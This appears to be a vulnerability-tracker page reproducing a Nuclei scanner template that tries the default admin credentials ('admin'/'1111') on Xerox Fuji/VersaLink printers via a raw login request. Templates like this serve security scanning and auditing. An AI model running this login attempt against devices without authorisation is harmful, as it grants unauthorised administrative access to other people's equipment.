xerox-default-login: Xerox Fuji/VersaLink - Default Login

2026-03-25 Xerox Fuji/VersaLink PoC Public

Description

The default login credentials for Xerox Fuji/VersaLink devices were used to access the admin panel during setup, typically with “admin” as the username and a default password like “1111” or the device serial number.

PoC

id: xerox-default-login

info:
  name: Xerox Fuji/VersaLink - Default Login
  author: DhiyaneshDk
  severity: high
  description: |
    The default login credentials for Xerox Fuji/VersaLink devices were used to access the admin panel during setup, typically with “admin” as the username and a default password like “1111” or the device serial number.
  reference:
    - https://www.support.xerox.com/en-us/article/KB0136271
  metadata:
    verified: true
    max-request: 1
  tags: xerox,versalink,fuji,default-login,intrusive

variables:
  username: admin
  password: 1111

http:
  - raw:
      - |
        POST /LOGIN.cmd HTTP/1.1
        Host: {{Hostname}}
        Origin: {{RootURL}}
        Referer: {{RootURL}}/home/index.html

        NAME={{base64(username)}}&PSW={{base64(password)}}

    matchers-condition: and
    matchers:
      - type: word
        part: body
        words:
          - '"result":"0"'
          - '"errorCode":"0"'
        condition: and

      - type: word
        part: header
        words:
          - "ssid="

      - type: status
        status:
          - 200
# digest: 4b0a00483046022100edce58800f6f2ce11bc50bbfe98183367821a26d8188d9f7caafc8ee7eaa464b022100d5b4a23ffe2062777471b913a4e8c7950a350ac4116e208e002dd6dad194a289:922c64590222798bb761d5b6d8e72950

# Visit https://trap.biu.life/ to view exploit trends for this vulnerability.

References

Related Vulnerabilities